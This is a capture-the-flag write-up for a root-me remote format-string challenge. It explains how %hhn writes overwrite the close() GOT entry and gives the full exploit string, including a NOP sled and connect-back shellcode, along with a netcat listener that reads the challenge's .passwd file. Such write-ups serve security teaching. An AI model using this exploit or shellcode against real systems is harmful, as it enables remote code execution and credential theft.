# 14. ELF x86 - Remote Format String bug

The final command to exploit the server is this: `python -c 'print("\x48\xa0\x04\x08" + "\x4b\xa0\x04\x08" + "\x49\xa0\x04\x08" + "\x4a\xa0\x04\x08" + "%08x"*4 + "A"*32 + "%hhn" + "A"*111 + "%hhn" + "A"*54 + "%hhn" + "A"*10 + "%hhn" + "\x90"*512 + "\x6a\x66\x58\x6a\x01\x5b\x31\xd2\x52\x53\x6a\x02\x89\xe1\xcd\x80\x92\xb0\x66\x68\x7f\x01\x01\x01\x66\x68\x05\x39\x43\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\x43\xcd\x80\x6a\x02\x59\x87\xda\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x41\x89\xca\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80")' | nc localhost 56032`. Note that you also need a netcat listener which will cat the .passwd file as soon as an inbound connection occurs, as there is a time limit to how long the server keeps the subprocesses open so we won't be able to cat the file manually in time. We can do this like so: `echo 'cat /challenge/app-systeme/ch32/.passwd' | nc -vlp 1337`

This exercise is fairly simple once you understand the principle. We need to exploit the %hhn option of printf to allow us to overwrite arbitrary memory. The %n option (and its variants) write how many bytes have been written to the output so far into the next parameter. If we have control of the format string, we can put an address on the stack simply by putting it in our string, and then read up until that address, so that the next parameter is ote address we want to write to, then write enough regular characters that the count it will write is what we want. Finally, we just put %hhn and it will overwrite the address we have pointed to by the value we set byh the count. This is well explained here: <https://www.youtube.com/watch?v=0WvrSfcdq1I>. We want to try overwrite an address which is 4 bytes. &n will by default overwrite 4 bytes but that would mean we would need to output a lot of characters to get the right count. In our case, we have an input and output byte limit of 1024, meaning we could only write very low pointers which is not useful. It's better to write each individual byte at once, as we would only need to write 255 bytes at most to set our byte values. However, if we needed to overflow our values to write each byte of our pointer we would be fairly close to the byte limit and not have much space for anything else we might want in out format string (such as shellcode). Instead, if we write the bytes in ascending order of their values, we can write only around 255 bytes total in order to set all 4 bytes to their correct values. This means more space for a nopsled and easier exploitation. Firstly, we need to find the address of the pointer we want to overwrite. By running `objdump -R ./ch32` we can find the pointer address of one of the library calls. In my case, `close()` which is called after we are done sending our format string, was at address `0804a048` whic implicitly means that the first byte of the pointer is at `0804a048` but it spans until `0804a04b`. Those are the bytes we want to overwrite with the address of our shellcode we want to execute. In order to find the address the shellcode will be at, we'll need to recompile the server with our own port so we can do some debugging without conflicting with the root-me server. Once that's done, we can execute the server in the background like so: `/tmp/ch32 &` and it will tell us the PID of the child server process it spawned. We can now debug the child process by doing `gdb -p <pid>`. To find the shellcode location, let's set a breakpoint in the `recv_loop()` after the `recv()` call. Then, by sending a bunch of A's we can find our starting address of our format string buffer by inspecting a couple dozen addresses after `$esp`. In my case it starts at `bffff37c`. Firstly, you should try overwrite the pointer with `deadbeef` so you know more or less how many characters you'll need for the format string itself. Then, once you know how many bytes the actual pointer overwrite will take, you can add your nopsled and shellcode according to how much space is left. In my case I could easily have a 512 byte long nopsled. Once you have the `deadbeef` format string, modifying it to work with your nopsled/shellcode (whose address you should be able to easily approximate using the starting address) without changing the length too much of the format string in total. Note that you should aim to land as close to the middle of the nopsled as possible so you have the most lee-way on either side.
